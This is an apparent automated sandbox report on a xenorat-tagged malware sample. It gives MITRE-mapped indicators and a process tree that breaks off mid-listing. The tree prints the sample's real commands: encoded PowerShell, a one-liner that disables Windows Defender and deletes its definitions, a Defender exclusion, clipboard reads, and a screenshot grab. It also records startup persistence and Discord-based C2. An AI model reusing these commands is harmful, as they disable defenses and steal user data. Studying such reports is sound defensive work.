xenorat | 363108d651fdaa2b799b73018a910f9c55fbbb7025761eabb37a673d5650542d

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	363108d651fdaa2b799b73018a910f9c55fbbb7025761eabb37a673d5650542d.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Usermode Disk Driver Host.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Runtime Broker.exe

Blocklisted process makes network request 1 IoCs

flow	pid	Process
18	4512	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4008	powershell.exe
4064	powershell.exe
1468	powershell.exe
4512	powershell.exe
2960	powershell.exe
4084	powershell.exe

Downloads MZ/PE file

Checks BIOS information in registry 2 TTPs 6 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	363108d651fdaa2b799b73018a910f9c55fbbb7025761eabb37a673d5650542d.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	363108d651fdaa2b799b73018a910f9c55fbbb7025761eabb37a673d5650542d.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Usermode Disk Driver Host.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Usermode Disk Driver Host.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Runtime Broker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Runtime Broker.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	363108d651fdaa2b799b73018a910f9c55fbbb7025761eabb37a673d5650542d.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	obfs.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
4724	cmd.exe
2600	powershell.exe

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Update Script.pyw	obfs.exe

Executes dropped EXE 6 IoCs

pid	Process
3800	Minecraft Checker.exe
4344	Runtime Broker.exe
2732	Usermode Disk Driver Host.exe
4436	obfs.exe
4136	tmpd5byfdmh.exe
1696	tmpd5byfdmh.exe

Loads dropped DLL 49 IoCs

pid	Process
4436	obfs.exe
4436	obfs.exe
4436	obfs.exe
4436	obfs.exe
4436	obfs.exe
4436	obfs.exe
4436	obfs.exe
4436	obfs.exe
4436	obfs.exe
4436	obfs.exe
4436	obfs.exe
4436	obfs.exe
4436	obfs.exe
4436	obfs.exe
4436	obfs.exe
4436	obfs.exe
4436	obfs.exe
4436	obfs.exe
4436	obfs.exe
4436	obfs.exe
4436	obfs.exe
4436	obfs.exe
4436	obfs.exe
4436	obfs.exe
4436	obfs.exe
4436	obfs.exe
4436	obfs.exe
4436	obfs.exe
4436	obfs.exe
4436	obfs.exe
4436	obfs.exe
4436	obfs.exe
4436	obfs.exe
4436	obfs.exe
4436	obfs.exe
4436	obfs.exe
4436	obfs.exe
4436	obfs.exe
4436	obfs.exe
4436	obfs.exe
4436	obfs.exe
4436	obfs.exe
4436	obfs.exe
4436	obfs.exe
4436	obfs.exe
4436	obfs.exe
4436	obfs.exe
4436	obfs.exe
1696	tmpd5byfdmh.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Themida packer 14 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral2/memory/4836-0-0x0000000000400000-0x0000000002758000-memory.dmp	themida
behavioral2/memory/4836-3-0x0000000000400000-0x0000000002758000-memory.dmp	themida
behavioral2/memory/4836-2-0x0000000000400000-0x0000000002758000-memory.dmp	themida
behavioral2/files/0x000e000000023bb7-19.dat	themida
behavioral2/files/0x0008000000023bb9-33.dat	themida
behavioral2/memory/4836-43-0x0000000000400000-0x0000000002758000-memory.dmp	themida
behavioral2/memory/2732-80-0x0000000000B70000-0x0000000001728000-memory.dmp	themida
behavioral2/memory/2732-82-0x0000000000B70000-0x0000000001728000-memory.dmp	themida
behavioral2/memory/4344-83-0x00007FF7A5010000-0x00007FF7A6AE4000-memory.dmp	themida
behavioral2/memory/4344-86-0x00007FF7A5010000-0x00007FF7A6AE4000-memory.dmp	themida
behavioral2/memory/4344-87-0x00007FF7A5010000-0x00007FF7A6AE4000-memory.dmp	themida
behavioral2/memory/4344-230-0x00007FF7A5010000-0x00007FF7A6AE4000-memory.dmp	themida
behavioral2/memory/4344-246-0x00007FF7A5010000-0x00007FF7A6AE4000-memory.dmp	themida
behavioral2/memory/4344-465-0x00007FF7A5010000-0x00007FF7A6AE4000-memory.dmp	themida

Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 3 IoCs

evasion trojan

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	363108d651fdaa2b799b73018a910f9c55fbbb7025761eabb37a673d5650542d.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Runtime Broker.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Usermode Disk Driver Host.exe

Hide Artifacts: Hidden Window 1 TTPs 1 IoCs

Windows that would typically be displayed when an application carries out an operation can be hidden.

defense_evasion

Hidden Window

T1564.003

pid	Process
2356	cmd.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
49	discord.com
50	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
43	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs

pid	Process
4836	363108d651fdaa2b799b73018a910f9c55fbbb7025761eabb37a673d5650542d.exe
4344	Runtime Broker.exe
2732	Usermode Disk Driver Host.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
1320	3800	WerFault.exe	85

System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	363108d651fdaa2b799b73018a910f9c55fbbb7025761eabb37a673d5650542d.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Minecraft Checker.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Usermode Disk Driver Host.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tmpd5byfdmh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tmpd5byfdmh.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	obfs.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	obfs.exe

Detects videocard installed 1 TTPs 2 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

pid	Process
2568	WMIC.exe
2856	WMIC.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
1804	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4680	powershell.exe
4680	powershell.exe
4512	powershell.exe
4512	powershell.exe
2732	Usermode Disk Driver Host.exe
2732	Usermode Disk Driver Host.exe
2732	Usermode Disk Driver Host.exe
2732	Usermode Disk Driver Host.exe
2732	Usermode Disk Driver Host.exe
2732	Usermode Disk Driver Host.exe
2732	Usermode Disk Driver Host.exe
2732	Usermode Disk Driver Host.exe
2732	Usermode Disk Driver Host.exe
2732	Usermode Disk Driver Host.exe
2732	Usermode Disk Driver Host.exe
2732	Usermode Disk Driver Host.exe
2732	Usermode Disk Driver Host.exe
2732	Usermode Disk Driver Host.exe
2732	Usermode Disk Driver Host.exe
2732	Usermode Disk Driver Host.exe
2732	Usermode Disk Driver Host.exe
2732	Usermode Disk Driver Host.exe
2732	Usermode Disk Driver Host.exe
2732	Usermode Disk Driver Host.exe
2732	Usermode Disk Driver Host.exe
2732	Usermode Disk Driver Host.exe
2732	Usermode Disk Driver Host.exe
2732	Usermode Disk Driver Host.exe
2732	Usermode Disk Driver Host.exe
2732	Usermode Disk Driver Host.exe
2732	Usermode Disk Driver Host.exe
2732	Usermode Disk Driver Host.exe
2732	Usermode Disk Driver Host.exe
2732	Usermode Disk Driver Host.exe
2732	Usermode Disk Driver Host.exe
2732	Usermode Disk Driver Host.exe
2732	Usermode Disk Driver Host.exe
2732	Usermode Disk Driver Host.exe
2732	Usermode Disk Driver Host.exe
2732	Usermode Disk Driver Host.exe
2732	Usermode Disk Driver Host.exe
2732	Usermode Disk Driver Host.exe
2732	Usermode Disk Driver Host.exe
2732	Usermode Disk Driver Host.exe
2732	Usermode Disk Driver Host.exe
2732	Usermode Disk Driver Host.exe
2732	Usermode Disk Driver Host.exe
2732	Usermode Disk Driver Host.exe
2732	Usermode Disk Driver Host.exe
2732	Usermode Disk Driver Host.exe
2732	Usermode Disk Driver Host.exe
2732	Usermode Disk Driver Host.exe
2732	Usermode Disk Driver Host.exe
2732	Usermode Disk Driver Host.exe
2732	Usermode Disk Driver Host.exe
2732	Usermode Disk Driver Host.exe
2732	Usermode Disk Driver Host.exe
2732	Usermode Disk Driver Host.exe
2732	Usermode Disk Driver Host.exe
2732	Usermode Disk Driver Host.exe
2732	Usermode Disk Driver Host.exe
4084	powershell.exe
4084	powershell.exe
2960	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4680	powershell.exe
Token: SeDebugPrivilege	4436	obfs.exe
Token: SeDebugPrivilege	4512	powershell.exe
Token: SeDebugPrivilege	2732	Usermode Disk Driver Host.exe
Token: SeIncreaseQuotaPrivilege	1800	WMIC.exe
Token: SeSecurityPrivilege	1800	WMIC.exe
Token: SeTakeOwnershipPrivilege	1800	WMIC.exe
Token: SeLoadDriverPrivilege	1800	WMIC.exe
Token: SeSystemProfilePrivilege	1800	WMIC.exe
Token: SeSystemtimePrivilege	1800	WMIC.exe
Token: SeProfSingleProcessPrivilege	1800	WMIC.exe
Token: SeIncBasePriorityPrivilege	1800	WMIC.exe
Token: SeCreatePagefilePrivilege	1800	WMIC.exe
Token: SeBackupPrivilege	1800	WMIC.exe
Token: SeRestorePrivilege	1800	WMIC.exe
Token: SeShutdownPrivilege	1800	WMIC.exe
Token: SeDebugPrivilege	1800	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1800	WMIC.exe
Token: SeRemoteShutdownPrivilege	1800	WMIC.exe
Token: SeUndockPrivilege	1800	WMIC.exe
Token: SeManageVolumePrivilege	1800	WMIC.exe
Token: 33	1800	WMIC.exe
Token: 34	1800	WMIC.exe
Token: 35	1800	WMIC.exe
Token: 36	1800	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1800	WMIC.exe
Token: SeSecurityPrivilege	1800	WMIC.exe
Token: SeTakeOwnershipPrivilege	1800	WMIC.exe
Token: SeLoadDriverPrivilege	1800	WMIC.exe
Token: SeSystemProfilePrivilege	1800	WMIC.exe
Token: SeSystemtimePrivilege	1800	WMIC.exe
Token: SeProfSingleProcessPrivilege	1800	WMIC.exe
Token: SeIncBasePriorityPrivilege	1800	WMIC.exe
Token: SeCreatePagefilePrivilege	1800	WMIC.exe
Token: SeBackupPrivilege	1800	WMIC.exe
Token: SeRestorePrivilege	1800	WMIC.exe
Token: SeShutdownPrivilege	1800	WMIC.exe
Token: SeDebugPrivilege	1800	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1800	WMIC.exe
Token: SeRemoteShutdownPrivilege	1800	WMIC.exe
Token: SeUndockPrivilege	1800	WMIC.exe
Token: SeManageVolumePrivilege	1800	WMIC.exe
Token: 33	1800	WMIC.exe
Token: 34	1800	WMIC.exe
Token: 35	1800	WMIC.exe
Token: 36	1800	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2568	WMIC.exe
Token: SeSecurityPrivilege	2568	WMIC.exe
Token: SeTakeOwnershipPrivilege	2568	WMIC.exe
Token: SeLoadDriverPrivilege	2568	WMIC.exe
Token: SeSystemProfilePrivilege	2568	WMIC.exe
Token: SeSystemtimePrivilege	2568	WMIC.exe
Token: SeProfSingleProcessPrivilege	2568	WMIC.exe
Token: SeIncBasePriorityPrivilege	2568	WMIC.exe
Token: SeCreatePagefilePrivilege	2568	WMIC.exe
Token: SeBackupPrivilege	2568	WMIC.exe
Token: SeRestorePrivilege	2568	WMIC.exe
Token: SeShutdownPrivilege	2568	WMIC.exe
Token: SeDebugPrivilege	2568	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2568	WMIC.exe
Token: SeRemoteShutdownPrivilege	2568	WMIC.exe
Token: SeUndockPrivilege	2568	WMIC.exe
Token: SeManageVolumePrivilege	2568	WMIC.exe
Token: 33	2568	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4836 wrote to memory of 4680	4836	363108d651fdaa2b799b73018a910f9c55fbbb7025761eabb37a673d5650542d.exe	83
PID 4836 wrote to memory of 4680	4836	363108d651fdaa2b799b73018a910f9c55fbbb7025761eabb37a673d5650542d.exe	83
PID 4836 wrote to memory of 4680	4836	363108d651fdaa2b799b73018a910f9c55fbbb7025761eabb37a673d5650542d.exe	83
PID 4836 wrote to memory of 3800	4836	363108d651fdaa2b799b73018a910f9c55fbbb7025761eabb37a673d5650542d.exe	85
PID 4836 wrote to memory of 3800	4836	363108d651fdaa2b799b73018a910f9c55fbbb7025761eabb37a673d5650542d.exe	85
PID 4836 wrote to memory of 3800	4836	363108d651fdaa2b799b73018a910f9c55fbbb7025761eabb37a673d5650542d.exe	85
PID 4836 wrote to memory of 4344	4836	363108d651fdaa2b799b73018a910f9c55fbbb7025761eabb37a673d5650542d.exe	87
PID 4836 wrote to memory of 4344	4836	363108d651fdaa2b799b73018a910f9c55fbbb7025761eabb37a673d5650542d.exe	87
PID 4836 wrote to memory of 2732	4836	363108d651fdaa2b799b73018a910f9c55fbbb7025761eabb37a673d5650542d.exe	88
PID 4836 wrote to memory of 2732	4836	363108d651fdaa2b799b73018a910f9c55fbbb7025761eabb37a673d5650542d.exe	88
PID 4836 wrote to memory of 2732	4836	363108d651fdaa2b799b73018a910f9c55fbbb7025761eabb37a673d5650542d.exe	88
PID 4344 wrote to memory of 4436	4344	Runtime Broker.exe	93
PID 4344 wrote to memory of 4436	4344	Runtime Broker.exe	93
PID 4436 wrote to memory of 4512	4436	obfs.exe	101
PID 4436 wrote to memory of 4512	4436	obfs.exe	101
PID 2732 wrote to memory of 1804	2732	Usermode Disk Driver Host.exe	104
PID 2732 wrote to memory of 1804	2732	Usermode Disk Driver Host.exe	104
PID 2732 wrote to memory of 1804	2732	Usermode Disk Driver Host.exe	104
PID 4436 wrote to memory of 4136	4436	obfs.exe	114
PID 4436 wrote to memory of 4136	4436	obfs.exe	114
PID 4436 wrote to memory of 4136	4436	obfs.exe	114
PID 4136 wrote to memory of 1696	4136	tmpd5byfdmh.exe	115
PID 4136 wrote to memory of 1696	4136	tmpd5byfdmh.exe	115
PID 4136 wrote to memory of 1696	4136	tmpd5byfdmh.exe	115
PID 4436 wrote to memory of 4396	4436	obfs.exe	116
PID 4436 wrote to memory of 4396	4436	obfs.exe	116
PID 4396 wrote to memory of 1800	4396	cmd.exe	118
PID 4396 wrote to memory of 1800	4396	cmd.exe	118
PID 4436 wrote to memory of 3136	4436	obfs.exe	119
PID 4436 wrote to memory of 3136	4436	obfs.exe	119
PID 3136 wrote to memory of 5024	3136	cmd.exe	121
PID 3136 wrote to memory of 5024	3136	cmd.exe	121
PID 4436 wrote to memory of 1420	4436	obfs.exe	122
PID 4436 wrote to memory of 1420	4436	obfs.exe	122
PID 1420 wrote to memory of 5004	1420	cmd.exe	124
PID 1420 wrote to memory of 5004	1420	cmd.exe	124
PID 4436 wrote to memory of 3460	4436	obfs.exe	125
PID 4436 wrote to memory of 3460	4436	obfs.exe	125
PID 3460 wrote to memory of 2568	3460	cmd.exe	127
PID 3460 wrote to memory of 2568	3460	cmd.exe	127
PID 4436 wrote to memory of 2208	4436	obfs.exe	128
PID 4436 wrote to memory of 2208	4436	obfs.exe	128
PID 2208 wrote to memory of 2856	2208	cmd.exe	130
PID 2208 wrote to memory of 2856	2208	cmd.exe	130
PID 4436 wrote to memory of 2356	4436	obfs.exe	131
PID 4436 wrote to memory of 2356	4436	obfs.exe	131
PID 2356 wrote to memory of 4084	2356	cmd.exe	133
PID 2356 wrote to memory of 4084	2356	cmd.exe	133
PID 4436 wrote to memory of 3564	4436	obfs.exe	134
PID 4436 wrote to memory of 3564	4436	obfs.exe	134
PID 4436 wrote to memory of 1936	4436	obfs.exe	136
PID 4436 wrote to memory of 1936	4436	obfs.exe	136
PID 4436 wrote to memory of 3868	4436	obfs.exe	137
PID 4436 wrote to memory of 3868	4436	obfs.exe	137
PID 4436 wrote to memory of 4724	4436	obfs.exe	140
PID 4436 wrote to memory of 4724	4436	obfs.exe	140
PID 4436 wrote to memory of 1532	4436	obfs.exe	141
PID 4436 wrote to memory of 1532	4436	obfs.exe	141
PID 3868 wrote to memory of 2960	3868	cmd.exe	145
PID 3868 wrote to memory of 2960	3868	cmd.exe	145
PID 4724 wrote to memory of 2600	4724	cmd.exe	146
PID 4724 wrote to memory of 2600	4724	cmd.exe	146
PID 1532 wrote to memory of 1468	1532	cmd.exe	147
PID 1532 wrote to memory of 1468	1532	cmd.exe	147

C:\Users\Admin\AppData\Local\Temp\363108d651fdaa2b799b73018a910f9c55fbbb7025761eabb37a673d5650542d.exe
"C:\Users\Admin\AppData\Local\Temp\363108d651fdaa2b799b73018a910f9c55fbbb7025761eabb37a673d5650542d.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4836
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGMAcgBnACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZwBzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGUAagBlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHgAZgBzACMAPgA="
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4680
- C:\Users\Admin\AppData\Local\Temp\Minecraft Checker.exe
  "C:\Users\Admin\AppData\Local\Temp\Minecraft Checker.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:3800
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3800 -s 892
    3⤵
    - Program crash
    PID:1320
- C:\Users\Admin\AppData\Local\Temp\Runtime Broker.exe
  "C:\Users\Admin\AppData\Local\Temp\Runtime Broker.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of WriteProcessMemory
  PID:4344
- - C:\Users\Admin\AppData\Local\Temp\onefile_4344_133780118610320967\obfs.exe
    "C:\Users\Admin\AppData\Local\Temp\Runtime Broker.exe"
    3⤵
    - Checks computer location settings
    - Drops startup file
    - Executes dropped EXE
    - Loads dropped DLL
    - Checks processor information in registry
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4436
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command " $url = \"https://www.python.org/ftp/python/3.11.0/python-3.11.0-amd64.exe\" $filePath = \"C:\Users\Admin\AppData\Local\Temp\tmpd5byfdmh.exe\" Invoke-WebRequest -Uri $url -OutFile $filePath "
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4512
  - - C:\Users\Admin\AppData\Local\Temp\tmpd5byfdmh.exe
      "C:\Users\Admin\AppData\Local\Temp\tmpd5byfdmh.exe" /quiet InstallAllUsers=1 PrependPath=1 Include_test=0
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:4136
    - - C:\Windows\Temp\{729E98B7-4529-4EE6-870F-5514E6C6333A}\.cr\tmpd5byfdmh.exe
        
        "C:\Windows\Temp\{729E98B7-4529-4EE6-870F-5514E6C6333A}\.cr\tmpd5byfdmh.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\tmpd5byfdmh.exe" -burn.filehandle.attached=648 -burn.filehandle.self=688 /quiet InstallAllUsers=1 PrependPath=1 Include_test=0
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:1696
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4396
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1800
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3136
    - - C:\Windows\system32\reg.exe
        
        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc
        5⤵
        
        PID:5024
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1420
    - - C:\Windows\system32\reg.exe
        
        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName
        5⤵
        
        PID:5004
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3460
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        5⤵
        Detects videocard installed
        Suspicious use of AdjustPrivilegeToken
        
        PID:2568
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2208
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        5⤵
        Detects videocard installed
        
        PID:2856
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File C:\Users\Admin\AppData\Local\Temp\ibVxS7.ps1"
      4⤵
      Hide Artifacts: Hidden Window
      Suspicious use of WriteProcessMemory
      PID:2356
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File C:\Users\Admin\AppData\Local\Temp\ibVxS7.ps1
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4084
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c " powershell.exe -nop -w hidden -encodedCommand UwBFAFgAIAAkAFsARQBtAGIAZABkAF0AIAAtAFMAbwB1AHIAYwBlACAAVwBpAG4AZABvAHcAcwAuAE0AaQBzAGMAcgBvAHMAbwBmAHQALgBJAE4AVwA7ACAASQBuAHQAUwBUAFIAdQBDAFQAIABbAFMAbwBjAGsAZQB0AF0AIAAtAEUAdgBlAG4AdAAgAE4AYQBtAGUAZAAgAEUAVgBBAEsAUwBQAF8AQgB5AHAAQQBTAFMAMAA= "
      4⤵
      PID:3564
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
      4⤵
      PID:1936
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4008
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\obfs.py'"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3868
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\obfs.py'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2960
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
      4⤵
      Clipboard Data
      Suspicious use of WriteProcessMemory
      PID:4724
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-Clipboard
        5⤵
        Clipboard Data
        
        PID:2600
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "Add-Type -AssemblyName System.Windows.Forms;Add-Type -AssemblyName System.Drawing;$bitmap = New-Object System.Drawing.Bitmap([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width, [System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Height);$graphics = [System.Drawing.Graphics]::FromImage($bitmap);$graphics.CopyFromScreen([System.Drawing.Point]::Empty, [System.Drawing.Point]::Empty, $bitmap.Size);$bitmap.Save('C:\Users\Admin\AppData\Local\Temp\Rumburak\Screenshot.png', [System.Drawing.Imaging.ImageFormat]::Png);""
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1532
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
